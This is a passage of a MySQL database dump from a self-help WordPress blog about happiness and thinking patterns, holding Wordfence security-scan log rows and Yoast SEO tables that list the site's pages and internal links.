(15911, 1711903794.496765, 2, 'info', 'Total disk space: 13.85 TB -- Free disk space: 1.66 TB'),
(15912, 1711903794.496984, 2, 'info', 'The disk has 1744812.98 MB available'),
(16227, 1712206410.788806, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(16226, 1712206410.788018, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 73.5 MB'),
(16225, 1712206410.787438, 1, 'info', '-------------------'),
(15920, 1711903794.525300, 2, 'info', 'Getting plugin list from WordPress'),
(15921, 1711903794.526992, 2, 'info', 'Found 6 plugins'),
(16526, 1712681599.638438, 2, 'info', 'Analyzed 5765 files containing 114.5 MB of data.'),
(16525, 1712681599.324206, 2, 'info', 'Analyzed 5700 files containing 113.39 MB of data so far'),
(16189, 1712162971.825194, 2, 'info', 'Scanned contents of 53 additional files at 20.38 per second'),
(16186, 1712162969.223421, 2, 'info', 'Starting scan of file contents'),
(16187, 1712162970.278438, 2, 'info', 'Scanned contents of 31 additional files at 29.43 per second'),
(16188, 1712162971.334133, 2, 'info', 'Scanned contents of 47 additional files at 22.28 per second'),
(15799, 1711645541.707367, 2, 'info', 'Analyzed 3100 files containing 57.94 MB of data so far'),
(16542, 1712681609.023280, 2, 'info', 'Done host key check.'),
(16543, 1712681609.043918, 2, 'info', 'Done file contents scan'),
(16544, 1712681609.045795, 10, 'info', 'SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),
(16545, 1712681609.050587, 10, 'info', 'SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),
(16546, 1712681609.056748, 10, 'info', 'SUM_START:Scanning for publicly accessible quarantined files'),
(16547, 1712681609.058762, 10, 'info', 'SUM_ENDOK:Scanning for publicly accessible quarantined files'),
(16548, 1712681609.064082, 10, 'info', 'SUM_START:Scanning posts for URLs on a domain blocklist'),
(16549, 1712681609.085479, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(16550, 1712681609.085815, 2, 'info', 'Done examining URLs'),
(16551, 1712681609.101933, 10, 'info', 'SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),
(16552, 1712681609.107551, 10, 'info', 'SUM_START:Scanning comments for URLs on a domain blocklist'),
(16553, 1712681609.229179, 10, 'info', 'SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),
(16044, 1711903820.418462, 1, 'info', 'Scan Complete. Scanned 5740 files, 6 plugins, 4 themes, 22 posts, 0 comments and 142 URLs in 32 seconds.'),
(16043, 1711903820.417176, 2, 'info', 'Wordfence used 16.5 MB of memory for scan. Server peak memory usage was: 85 MB'),
(16441, 1712681580.057625, 10, 'info', 'SUM_ENDOK:Checking for paths skipped due to scan settings'),
(16042, 1711903820.415659, 1, 'info', '-------------------'),
(16040, 1711903820.406780, 2, 'info', 'Done examining URLs'),
(16554, 1712681609.423583, 10, 'info', 'SUM_START:Scanning for weak passwords'),
(16320, 1712422400.552455, 2, 'info', 'Analyzed 2700 files containing 43.96 MB of data so far'),
(15613, 1711384954.258498, 2, 'info', 'Analyzed 1900 files containing 29.33 MB of data so far'),
(16318, 1712422400.262421, 2, 'info', 'Analyzed 2500 files containing 41.72 MB of data so far'),
(16319, 1712422400.398077, 2, 'info', 'Analyzed 2600 files containing 43 MB of data so far'),
(16555, 1712681609.426943, 2, 'info', 'Starting password strength check on 2 users.'),
(16556, 1712681609.440371, 10, 'info', 'SUM_ENDOK:Scanning for weak passwords'),
(16557, 1712681609.448209, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(16558, 1712681610.726497, 10, 'info', 'SUM_ENDOK:Scanning for old themes, plugins and core files'),
(16559, 1712681610.832499, 10, 'info', 'SUM_START:Scanning for admin users not created through WordPress'),
(15612, 1711384954.152783, 2, 'info', 'Analyzed 1800 files containing 28.74 MB of data so far'),
(16560, 1712681611.063297, 10, 'info', 'SUM_ENDOK:Scanning for admin users not created through WordPress'),
(16561, 1712681611.070974, 10, 'info', 'SUM_START:Scanning for suspicious site options'),
(16562, 1712681611.083935, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(15611, 1711384954.022961, 2, 'info', 'Analyzed 1700 files containing 28.51 MB of data so far');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wftrafficrates`
--

CREATE TABLE `wpou_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfwaffailures`
--

CREATE TABLE `wpou_wfwaffailures` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `throwable` text NOT NULL,
  `rule_id` int(10) unsigned DEFAULT NULL,
  `timestamp` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoast_indexable`
--

CREATE TABLE `wpou_yoast_indexable` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `permalink` longtext DEFAULT NULL,
  `permalink_hash` varchar(40) DEFAULT NULL,
  `object_id` bigint(20) DEFAULT NULL,
  `object_type` varchar(32) NOT NULL,
  `object_sub_type` varchar(32) DEFAULT NULL,
  `author_id` bigint(20) DEFAULT NULL,
  `post_parent` bigint(20) DEFAULT NULL,
  `title` text DEFAULT NULL,
  `description` mediumtext DEFAULT NULL,
  `breadcrumb_title` text DEFAULT NULL,
  `post_status` varchar(20) DEFAULT NULL,
  `is_public` tinyint(1) DEFAULT NULL,
  `is_protected` tinyint(1) DEFAULT 0,
  `has_public_posts` tinyint(1) DEFAULT NULL,
  `number_of_pages` int(11) unsigned DEFAULT NULL,
  `canonical` longtext DEFAULT NULL,
  `primary_focus_keyword` varchar(191) DEFAULT NULL,
  `primary_focus_keyword_score` int(3) DEFAULT NULL,
  `readability_score` int(3) DEFAULT NULL,
  `is_cornerstone` tinyint(1) DEFAULT 0,
  `is_robots_noindex` tinyint(1) DEFAULT 0,
  `is_robots_nofollow` tinyint(1) DEFAULT 0,
  `is_robots_noarchive` tinyint(1) DEFAULT 0,
  `is_robots_noimageindex` tinyint(1) DEFAULT 0,
  `is_robots_nosnippet` tinyint(1) DEFAULT 0,
  `twitter_title` text DEFAULT NULL,
  `twitter_image` longtext DEFAULT NULL,
  `twitter_description` longtext DEFAULT NULL,
  `twitter_image_id` varchar(191) DEFAULT NULL,
  `twitter_image_source` text DEFAULT NULL,
  `open_graph_title` text DEFAULT NULL,
  `open_graph_description` longtext DEFAULT NULL,
  `open_graph_image` longtext DEFAULT NULL,
  `open_graph_image_id` varchar(191) DEFAULT NULL,
  `open_graph_image_source` text DEFAULT NULL,
  `open_graph_image_meta` mediumtext DEFAULT NULL,
  `link_count` int(11) DEFAULT NULL,
  `incoming_link_count` int(11) DEFAULT NULL,
  `prominent_words_version` int(11) unsigned DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `blog_id` bigint(20) NOT NULL DEFAULT 1,
  `language` varchar(32) DEFAULT NULL,
  `region` varchar(32) DEFAULT NULL,
  `schema_page_type` varchar(64) DEFAULT NULL,
  `schema_article_type` varchar(64) DEFAULT NULL,
  `has_ancestors` tinyint(1) DEFAULT 0,
  `estimated_reading_time_minutes` int(11) DEFAULT NULL,
  `version` int(11) DEFAULT 1,
  `object_last_modified` datetime DEFAULT NULL,
  `object_published_at` datetime DEFAULT NULL,
  `inclusive_language_score` int(3) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `object_type_and_sub_type` (`object_type`,`object_sub_type`),
  KEY `object_id_and_type` (`object_id`,`object_type`),
  KEY `permalink_hash_and_object_type` (`permalink_hash`,`object_type`),
  KEY `subpages` (`post_parent`,`object_type`,`post_status`,`object_id`),
  KEY `prominent_words` (`prominent_words_version`,`object_type`,`object_sub_type`,`post_status`),
  KEY `published_sitemap_index` (`object_published_at`,`is_robots_noindex`,`object_type`,`object_sub_type`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wpou_yoast_indexable`
--

INSERT INTO `wpou_yoast_indexable` VALUES
(5, 'https://www.happythinking.com/category/uncategorized/', '53:3576095b0aaaf874881e6c378d966018', 1, 'term', 'category', NULL, NULL, NULL, NULL, 'Uncategorized', NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, '2023-04-10 08:59:03', '2023-04-12 22:22:39', 1, NULL, NULL, NULL, NULL, 0, NULL, 2, '2023-04-10 07:36:55', '2023-04-10 07:36:55', NULL),
(6, NULL, NULL, NULL, 'system-page', '404', NULL, NULL, 'Page not found %%sep%% %%sitename%%', NULL, 'Error 404: Page not found', NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 1, 0, 0, 0, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '2023-04-10 08:59:03', '2023-04-11 07:06:27', 1, NULL, NULL, NULL, NULL, 0, NULL, 1, NULL, NULL, NULL),
(7, NULL, NULL, NULL, 'system-page', 'search-result', NULL, NULL, 'You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%', NULL, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 1, 0, 0, 0, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '2023-04-10 08:59:03', '2023-04-28 16:35:40', 1, NULL, NULL, NULL, NULL, 0, NULL, 1, NULL, NULL, NULL),
(8, NULL, NULL, NULL, 'date-archive', NULL, NULL, NULL, '%%date%% %%page%% %%sep%% %%sitename%%', '', NULL, NULL, 0, 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 1, 0, 0, 0, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '2023-04-10 08:59:03', '2023-05-21 11:22:41', 1, NULL, NULL, NULL, NULL, 0, NULL, 1, NULL, NULL, NULL),
(9, 'https://www.happythinking.com/', '30:cad7d150741b2e542d5e37700afba2b2', NULL, 'home-page', NULL, NULL, NULL, '%%sitename%% %%page%% %%sep%% %%sitedesc%%', 'Find happiness by changing how you think', 'Home', NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 0, 0, 0, NULL, NULL, NULL, NULL, NULL, '%%sitename%%', '', '', '0', NULL, NULL, NULL, 12, NULL, '2023-04-10 08:59:03', '2024-02-28 08:33:51', 1, NULL, NULL, NULL, NULL, 0, NULL, 2, '2024-01-28 16:19:34', NULL, NULL),
(10, 'https://www.happythinking.com/', '30:cad7d150741b2e542d5e37700afba2b2', 88, 'post', 'page', 1, 0, NULL, NULL, 'Find happiness by changing how you think', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 90, 0, NULL, 0, NULL, NULL, NULL, NULL, 'https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg', NULL, NULL, 'first-content-image', NULL, NULL, 'https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg', NULL, 'first-content-image', NULL, 1, 5, NULL, '2023-04-10 10:08:23', '2024-01-12 22:26:12', 1, NULL, NULL, NULL, NULL, 0, 2, 2, '2024-01-12 22:26:12', '2020-08-17 05:29:01', 0),
(20, 'https://www.happythinking.com/disclaimer/', '41:636033ba309d010ad2dbdceeab1fc4b2', 451, 'post', 'page', 2, 0, NULL, NULL, 'Disclaimer', 'publish', 0, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, 1, 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, NULL, NULL, '2023-04-10 10:08:23', '2023-06-21 16:12:52', 1, NULL, NULL, NULL, NULL, 0, 2, 2, '2023-06-21 16:12:51', '2020-09-27 14:47:37', 0),
(63, 'https://www.happythinking.com/what-is-happiness/', '48:c42f9bc6cc9e35e9bda7fd106a4e697a', 1994, 'post', 'page', 1, 0, NULL, NULL, 'What is happiness?', 'publish', 0, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2023-07-02 09:20:41', '2023-08-04 04:44:27', 1, NULL, NULL, NULL, NULL, 0, 2, 2, '2023-07-02 09:24:52', '2023-07-02 09:21:20', 0),
(21, 'https://www.happythinking.com/donate/', '37:7b9a56161417a7c8a242bcabbcf3fa29', 455, 'post', 'page', 2, 0, NULL, NULL, 'Donate', 'publish', 0, 0, NULL, NULL, NULL, NULL, NULL, 90, 0, 1, 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 2, NULL, '2023-04-10 10:08:23', '2023-08-09 14:45:14', 1, NULL, NULL, NULL, NULL, 0, 1, 2, '2020-09-27 14:51:35', '2020-09-27 14:51:35', NULL),
(22, 'https://www.happythinking.com/about-me/', '39:ef8b1e62eab80199bab5c78408f68da4', 466, 'post', 'page', 1, 0, NULL, NULL, 'About me', 'publish', 0, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, 1, 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, 0, NULL, '2023-04-10 10:08:23', '2023-08-09 18:45:16', 1, NULL, NULL, NULL, NULL, 0, 3, 2, '2023-08-09 18:45:16', '2020-09-27 15:00:23', 0),
(25, 'https://www.happythinking.com/payment-confirmation/', '51:855db257d55cda2e64be2ea78c2ff616', 510, 'post', 'page', 2, 0, NULL, NULL, 'A big thank you !', 'publish', 0, 0, NULL, NULL, NULL, NULL, NULL, 90, 0, 1, 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, '2023-04-10 10:08:23', '2023-06-06 04:10:07', 1, NULL, NULL, NULL, NULL, 0, 1, 2, '2023-06-06 08:10:07', '2020-10-04 07:56:53', 0),
(26, 'https://www.happythinking.com/payment-failed/', '45:9e22efe6066655a70714679032ab9ce8', 511, 'post', 'page', 2, 0, NULL, NULL, 'Payment Failed', 'publish', 0, 0, NULL, NULL, NULL, NULL, NULL, 90, 0, 1, 1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, '2023-04-10 10:08:23', '2023-06-06 04:13:42', 1, NULL, NULL, NULL, NULL, 0, 1, 2, '2023-06-06 08:13:41', '2020-10-04 07:56:53', 0),
(28, 'https://www.happythinking.com/introduction/', '43:9c2b3bd47903ae7533750133f33b6559', 1034, 'post', 'page', 1, 0, NULL, NULL, 'Introduction', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 60, 0, NULL, 0, NULL, NULL, NULL, NULL, 'https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg', NULL, NULL, 'first-content-image', NULL, NULL, 'https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg', NULL, 'first-content-image', NULL, 3, 3, NULL, '2023-04-10 10:08:23', '2024-02-28 03:33:51', 1, NULL, NULL, NULL, NULL, 0, 6, 2, '2024-01-10 14:22:08', '2021-04-10 13:44:49', 0),
(66, 'https://www.happythinking.com/howtobehappyexplained/', '52:8fb8a4cdc9b3985836ec0ace148d96ab', 2110, 'post', 'page', 1, 0, NULL, NULL, 'How to be happy explained', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 90, 0, NULL, 0, NULL, NULL, NULL, NULL, 'https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg', NULL, NULL, 'first-content-image', NULL, NULL, 'https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg', NULL, 'first-content-image', NULL, 1, NULL, NULL, '2023-12-30 17:30:23', '2024-01-28 16:19:34', 1, NULL, NULL, NULL, NULL, 0, 2, 2, '2024-01-28 16:19:34', '2023-12-30 17:30:23', 0),
(35, 'https://www.happythinking.com/negativity-effect/', '48:3057fd30cb466151df8dd080bb96cdec', 1616, 'post', 'page', 1, 0, NULL, NULL, 'Focusing on Negativity', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, NULL, 0, NULL, NULL, NULL, NULL, 'https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg', NULL, NULL, 'first-content-image', NULL, NULL, 'https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg', NULL, 'first-content-image', NULL, 3, 2, NULL, '2023-05-30 17:31:39', '2023-08-06 15:50:37', 1, NULL, NULL, NULL, NULL, 0, 4, 2, '2023-08-06 15:50:36', '2023-05-30 17:32:03', 0),
(36, 'https://www.happythinking.com/catastrophic-thinking/', '52:9a9c1ffe73354ffe7d908b8be1a6549e', 1620, 'post', 'page', 1, 0, NULL, NULL, 'Catastrophic thinking', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 3, 2, NULL, '2023-05-30 17:36:03', '2023-08-08 15:21:10', 1, NULL, NULL, NULL, NULL, 0, 3, 2, '2023-08-08 15:21:10', '2023-05-30 17:36:03', 0),
(37, 'https://www.happythinking.com/all-or-nothing-thinking/', '54:5e84f51c0c529c57172e2d88baefed8c', 1627, 'post', 'page', 1, 0, NULL, NULL, 'All or nothing thinking', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, NULL, 0, NULL, NULL, NULL, NULL, 'https://www.happythinking.com/wp-content/uploads/all_cups_170623b.jpg', NULL, NULL, 'first-content-image', NULL, NULL, 'https://www.happythinking.com/wp-content/uploads/all_cups_170623b.jpg', NULL, 'first-content-image', NULL, 3, 2, NULL, '2023-05-30 17:46:19', '2023-08-06 15:59:00', 1, NULL, NULL, NULL, NULL, 0, 4, 2, '2023-08-06 15:58:59', '2023-05-30 17:46:19', 0),
(38, 'https://www.happythinking.com/negative-core-beliefs/', '52:76bcdf76ae11071cc25e1246935afc61', 1632, 'post', 'page', 1, 0, NULL, NULL, 'Untrue central beliefs', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 3, 2, NULL, '2023-05-30 17:52:37', '2023-08-09 18:25:27', 1, NULL, NULL, NULL, NULL, 0, 5, 2, '2023-08-09 18:25:27', '2023-05-30 17:52:37', 0),
(40, 'https://www.happythinking.com/psychological-tools/', '50:3b56f6509b8061e21bbaeb34e79b8a48', 1641, 'post', 'page', 1, 0, NULL, NULL, 'Psychological tools', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 3, 2, NULL, '2023-05-30 18:05:37', '2024-01-12 14:55:58', 1, NULL, NULL, NULL, NULL, 0, 3, 2, '2024-01-12 14:55:57', '2023-05-30 18:05:37', 0),
(41, 'https://www.happythinking.com/inner-voice/', '42:86b6d5d16aec6964453da505f6bd14d0', 1646, 'post', 'page', 1, 0, NULL, NULL, 'Inner voice', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 60, 0, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 3, 2, NULL, '2023-05-30 18:19:52', '2023-08-09 18:29:58', 1, NULL, NULL, NULL, NULL, 0, 2, 2, '2023-08-09 18:29:58', '2023-05-30 18:19:52', 0),
(42, 'https://www.happythinking.com/pause/', '36:b397dddd41c4ff85faf7656c58743855', 1650, 'post', 'page', 1, 0, NULL, NULL, 'Pause tool', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 3, 2, NULL, '2023-05-30 18:23:24', '2023-08-09 18:31:03', 1, NULL, NULL, NULL, NULL, 0, 4, 2, '2023-08-09 18:31:02', '2023-05-30 18:23:24', 0),
(43, 'https://www.happythinking.com/reality-check/', '44:233cd070e160921a35434466b52b97a4', 1655, 'post', 'page', 1, 0, NULL, NULL, 'Reality check tool', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 3, 2, NULL, '2023-05-30 18:28:06', '2023-08-09 14:38:28', 1, NULL, NULL, NULL, NULL, 0, 4, 2, '2023-08-09 18:35:24', '2023-05-30 18:28:34', 0),
(44, 'https://www.happythinking.com/ignore-move-on/', '45:7dc3baf1be3408198b114296d0fbb28c', 1658, 'post', 'page', 1, 0, NULL, NULL, 'Ignore / Move on tool', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 3, 1, NULL, '2023-05-30 18:32:06', '2023-08-09 18:39:13', 1, NULL, NULL, NULL, NULL, 0, 3, 2, '2023-08-09 18:39:13', '2023-05-30 18:32:20', 0),
(45, 'https://www.happythinking.com/other-possibilities/', '50:62c6fc204f6c0f8a632613c8da521549', 1661, 'post', 'page', 1, 0, NULL, NULL, 'â€œOther possibilitiesâ€ tool', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 3, 3, NULL, '2023-05-30 18:36:00', '2023-08-09 18:37:02', 1, NULL, NULL, NULL, NULL, 0, 3, 2, '2023-08-09 18:37:02', '2023-05-30 18:36:34', 0),
(46, 'https://www.happythinking.com/gratitude/', '40:4e13a11c7b996c2201ae00d301edd1db', 1664, 'post', 'page', 1, 0, NULL, NULL, 'Gratitude tool', 'publish', NULL, 0, NULL, NULL, NULL, NULL, NULL, 30, 0, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 3, 2, NULL, '2023-05-30 18:40:59', '2023-08-09 18:41:32', 1, NULL, NULL, NULL, NULL, 0, 4, 2, '2023-08-09 18:41:31', '2023-05-30 18:41:33', 0),
(47, 'https://www.happythinking.com/conclusion/', '41:d2430e35ac95f328934fa7a334591561', 1667, 'post', 'page', 1, 0, NULL, NULL, 'Conclusion', 'publish', 0, 0, NULL, NULL, NULL, NULL, NULL, 60, 0, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 3, 1, NULL, '2023-05-30 18:44:44', '2023-08-09 18:42:37', 1, NULL, NULL, NULL, NULL, 0, 2, 2, '2023-08-09 18:42:36', '2023-05-30 18:45:20', 0),
(60, 'https://www.happythinking.com/result/', '37:2dc569629694911887694e567bb60d59', 1919, 'post', 'page', 1, 0, NULL, NULL, 'Result', 'publish', 0, 0, NULL, NULL, NULL, NULL, NULL, 0, 0, 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, '2023-06-21 09:53:27', '2023-06-26 07:43:03', 1, NULL, NULL, NULL, NULL, 0, 1, 2, '2023-06-26 07:43:03', '2023-06-21 09:53:27', 0);

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoast_indexable_hierarchy`
--

CREATE TABLE `wpou_yoast_indexable_hierarchy` (
  `indexable_id` int(11) unsigned NOT NULL,
  `ancestor_id` int(11) unsigned NOT NULL,
  `depth` int(11) unsigned DEFAULT NULL,
  `blog_id` bigint(20) NOT NULL DEFAULT 1,
  PRIMARY KEY (`indexable_id`,`ancestor_id`),
  KEY `indexable_id` (`indexable_id`),
  KEY `ancestor_id` (`ancestor_id`),
  KEY `depth` (`depth`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wpou_yoast_indexable_hierarchy`
--

INSERT INTO `wpou_yoast_indexable_hierarchy` VALUES
(5, 0, 0, 1),
(9, 0, 0, 1),
(10, 0, 0, 1),
(43, 0, 0, 1),
(38, 0, 0, 1),
(40, 0, 0, 1),
(41, 0, 0, 1),
(35, 0, 0, 1),
(44, 0, 0, 1),
(46, 0, 0, 1),
(20, 0, 0, 1),
(21, 0, 0, 1),
(22, 0, 0, 1),
(45, 0, 0, 1),
(47, 0, 0, 1),
(25, 0, 0, 1),
(26, 0, 0, 1),
(28, 0, 0, 1),
(66, 0, 0, 1),
(42, 0, 0, 1),
(37, 0, 0, 1),
(36, 0, 0, 1),
(63, 0, 0, 1),
(7, 0, 0, 1),
(60, 0, 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoast_migrations`
--

CREATE TABLE `wpou_yoast_migrations` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `version` varchar(191) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `wpou_yoast_migrations_version` (`version`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wpou_yoast_migrations`
--

INSERT INTO `wpou_yoast_migrations` VALUES
(1, '20171228151840'),
(2, '20171228151841'),
(3, '20190529075038'),
(4, '20191011111109'),
(5, '20200408101900'),
(6, '20200420073606'),
(7, '20200428123747'),
(8, '20200428194858'),
(9, '20200429105310'),
(10, '20200430075614'),
(11, '20200430150130'),
(12, '20200507054848'),
(13, '20200513133401'),
(14, '20200609154515'),
(15, '20200616130143'),
(16, '20200617122511'),
(17, '20200702141921'),
(18, '20200728095334'),
(19, '20201202144329'),
(20, '20201216124002'),
(21, '20201216141134'),
(22, '20210817092415'),
(23, '20211020091404'),
(24, '20230417083836');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoast_primary_term`
--

CREATE TABLE `wpou_yoast_primary_term` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) DEFAULT NULL,
  `term_id` bigint(20) DEFAULT NULL,
  `taxonomy` varchar(32) NOT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `blog_id` bigint(20) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `post_taxonomy` (`post_id`,`taxonomy`),
  KEY `post_term` (`post_id`,`term_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoast_seo_links`
--

CREATE TABLE `wpou_yoast_seo_links` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) DEFAULT NULL,
  `post_id` bigint(20) unsigned DEFAULT NULL,
  `target_post_id` bigint(20) unsigned DEFAULT NULL,
  `type` varchar(8) DEFAULT NULL,
  `indexable_id` int(11) unsigned DEFAULT NULL,
  `target_indexable_id` int(11) unsigned DEFAULT NULL,
  `height` int(11) unsigned DEFAULT NULL,
  `width` int(11) unsigned DEFAULT NULL,
  `size` int(11) unsigned DEFAULT NULL,
  `language` varchar(32) DEFAULT NULL,
  `region` varchar(32) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `link_direction` (`post_id`,`type`),
  KEY `indexable_link_direction` (`indexable_id`,`type`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_yoast_seo_links`
--

INSERT INTO `wpou_yoast_seo_links` VALUES
(341, 'https://www.happythinking.com/negativity-effect/', 1034, 1616, 'internal', 28, 35, NULL, NULL, NULL, NULL, NULL),
(259, 'https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg', 1034, 1782, 'image-in', 28, NULL, 600, 600, 272724, NULL, NULL),
(228, 'https://www.happythinking.com/catastrophic-thinking/', 1616, 1620, 'internal', 35, 36, NULL, NULL, NULL, NULL, NULL),
(157, 'https://www.happythinking.com/', 1616, NULL, 'internal', 35, 9, NULL, NULL, NULL, NULL, NULL),
(393, 'https://www.happythinking.com/ignore-move-on/', 1661, 1658, 'internal', 45, 44, NULL, NULL, NULL, NULL, NULL),
(302, 'https://www.happythinking.com/psychological-tools/', 1632, 1641, 'internal', 38, 40, NULL, NULL, NULL, NULL, NULL),
(135, 'https://www.happythinking.com/introduction/', 88, 1034, 'internal', 10, 28, NULL, NULL, NULL, NULL, NULL),
(387, 'https://www.happythinking.com/wp-content/uploads/shape_bounce_21_7_23.jpg', 1034, 2041, 'image-in', 28, NULL, 600, 600, 170534, NULL, NULL),
(403, 'https://www.happythinking.com/introduction/', 2110, 1034, 'internal', 66, 28, NULL, NULL, NULL, NULL, NULL),
